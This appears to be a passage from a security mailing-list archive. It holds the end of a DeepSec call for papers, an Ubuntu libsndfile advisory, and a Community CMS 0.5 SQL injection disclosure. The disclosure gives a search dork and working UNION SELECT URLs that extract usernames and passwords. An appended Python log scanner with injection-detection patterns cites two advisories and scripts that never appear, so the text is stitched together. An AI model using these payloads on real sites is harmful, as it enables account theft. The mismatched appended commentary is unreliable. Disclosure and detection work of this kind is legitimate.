 - Messaging Technologies
 - Network Protocols
 - Operating Systems
 - Secure Software Development
 - Security Management
 - Social Engineering
 - Virtualisation

Please note that we are a non-product, non-vendor-biased security
conference and do not welcome vendor pitches in the conference talks or
trainings. We will provide an opportunity for vendor self presentation
through sponsorship and vendor booths in the conference lounge, where
coffee and snacks will be served during the breaks.

== Hacker Lounge ==

If you don't wish to present a talk or conduct a workshop, you can still
try to participate. We are looking for hackers who want to show us their
gadgets and methods to break (or fix) networks and security systems. If you
have something with lots of blinkenlights, stealth, or ideas that go
well with security topics, we want to hear about it. Submit it on the CfP
web page and get a place in the foyer to show off.

== Submission ==

Proposals for talks and trainings at the second annual DeepSec
In-Depth Security Conference will be accepted until
_July 15th 2009, 23:59 CEST_.

All proposals should be submitted through our web site
https://deepsec.net/cfp/ or by email to: c...@deepsec.net

== About DeepSec ==

DeepSec IDSC is an annual European two-day in-depth conference on computer,
network, and application security. It takes place in November and aims to
bring together the world's leading security professionals from academics,
government, industry, business, and the underground hacking community. The
conference offers two days of security talks and two days of trainings,
covering the latest topics in network and IT security.

DeepSec offers a neutral ground to exchange ideas and experiences, thus
making it a unique event where all participants can get in contact freely.

== Speakers/Trainers ==

Speaker privileges include:

 - One economy class return-ticket to Vienna.
 - 3 nights of accommodation in the conference hotel.
 - Breakfast, lunch, and two coffee breaks
 - Speaker activities during, before, and after the conference.
 - Speaker's Dinner.
 - Speaker After-Party in the Metalab Hackerspace.

Instructor privileges include:

 - 50% of the net profit of the class.
 - 2 nights of accommodation in the conference hotel during the trainings.
 - Breakfast, lunch, and two coffee breaks.
 - Free ticket for the conference.
 - Speaker activities during, before, and after the conference.
 - Speaker After-Party in the Metalab Hackerspace.

If you have questions, want to send us additional material, or have
problems with the web form, feel free to contact us at: c...@deepsec.net

Best regards,
DeepSec In-Depth Security Conference organisation team.

https://deepsec.net/contact/



[USN-749-1] libsndfile vulnerability

2009-03-30 Thread Marc Deslauriers
===
Ubuntu Security Notice USN-749-1 March 30, 2009
libsndfile vulnerability
CVE-2009-0186
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libsndfile1 1.0.12-3ubuntu1.1

Ubuntu 7.10:
  libsndfile1 1.0.17-4ubuntu0.7.10.1

Ubuntu 8.04 LTS:
  libsndfile1 1.0.17-4ubuntu0.8.04.1

Ubuntu 8.10:
  libsndfile1 1.0.17-4ubuntu0.8.10.1

After a standard system upgrade you need to restart your session to effect
the necessary changes.

Details follow:

It was discovered that libsndfile did not correctly handle description
chunks in CAF audio files. If a user or automated system were tricked into
opening a specially crafted CAF audio file, an attacker could execute
arbitrary code with the privileges of the user invoking the program.


Updated packages for Ubuntu 6.06 LTS:

Updated packages for Ubuntu 7.10:



Community CMS 0.5 Multiple SQL Injection Vulnerabilities

2009-03-30 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: Community CMS
[+] Version: 0.5
[+] Website: http://sourceforge.net/projects/communitycms/

[+] Bugs: [A] Multiple SQL Injection

[+] Exploitation: Remote
[+] Dork: intext:Powered by Community CMS
[+] Date: 30 Mar 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


- [A] SQL Injection

[-] File affected: view.php, calendar.php

This bug allows a guest to view the username and
password of a registered user.


*

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/view.php?article_id=-1 UNION ALL SELECT
1,2,username,password,5,6,7,8,9 FROM comcms_users

http://www.site.com/path/index.php?id=2&view=event&a=-1 UNION ALL
SELECT 1,2,3,4,5,6,7,CONCAT(username, 0x3a,
password),NULL,NULL,NULL,12,13,NULL FROM comcms_users%23


*

[+] Fix

No fix.


*

-- 
Salvatore drosophila Fresta
CWNP444351
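As an added example that is not part of either advisory, the following Python scans web-server access-log lines for the request shapes the two Fresta advisories above describe (UNION SELECT against addressbook.php and view.php, "or 1=1" against activate.php) and also flags id-like parameters that carry non-integer values. The log lines, client addresses and script paths are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (not from either advisory): a benign request
# per script plus requests shaped like the payloads the advisories describe.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Mar/2009:10:00:01 +0200] "GET /fcms/addressbook.php?letter=A HTTP/1.1" 200 512
203.0.113.5 - - [30/Mar/2009:10:00:07 +0200] "GET /fcms/addressbook.php?letter=-1%25%27%20UNION%20ALL%20SELECT%201,2,NULL,username,5,password,email%20FROM%20fcms_users%23 HTTP/1.1" 200 2048
203.0.113.5 - - [30/Mar/2009:10:00:12 +0200] "GET /fcms/activate.php?uid=1%20or%201%3D1&code= HTTP/1.1" 302 0
198.51.100.9 - - [30/Mar/2009:10:01:03 +0200] "GET /cms/view.php?article_id=42 HTTP/1.1" 200 4096
198.51.100.9 - - [30/Mar/2009:10:01:09 +0200] "GET /cms/view.php?article_id=-1%20UNION%20ALL%20SELECT%201,2,username,password,5,6,7,8,9%20FROM%20comcms_users HTTP/1.1" 200 4100
"""

# Common Log Format request line: client, timestamp, method, target, status.
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Signatures of the injection shapes in the advisories, applied to URL-decoded
# parameter values so that %20 / %25 / %23 encoding cannot hide them.
RULES = (
    ("union-select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("into-outfile", re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
    ("tautology", re.compile(r"\bor\s+(\d+)\s*=\s*\1\b", re.I)),
    ("comment-terminator", re.compile(r"#|--\s|/\*")),
)

def classify_value(value):
    """Names of every rule the decoded parameter value trips, in RULES order."""
    return [name for name, rx in RULES if rx.search(value)]

def is_int_param(name):
    """Parameters the advisories show being used as integers: id, uid, *_id."""
    return name in ("id", "uid") or name.endswith("_id")

def scan_log(text):
    """One finding per suspicious parameter: line, client, script, param, rules."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        url = urlsplit(m["target"])
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            hits = classify_value(value)
            # An id-like parameter whose value is not an integer is suspicious on its own.
            if is_int_param(name) and not re.fullmatch(r"-?\d+", value):
                hits.append("non-integer-id")
            if hits:
                findings.append({"line": lineno, "client": m["client"],
                                 "script": url.path, "param": name, "rules": hits})
    return findings
```

POST bodies (the lostpw.php case) never reach an access log, so that vector needs request-body logging or a database-side check for INTO OUTFILE.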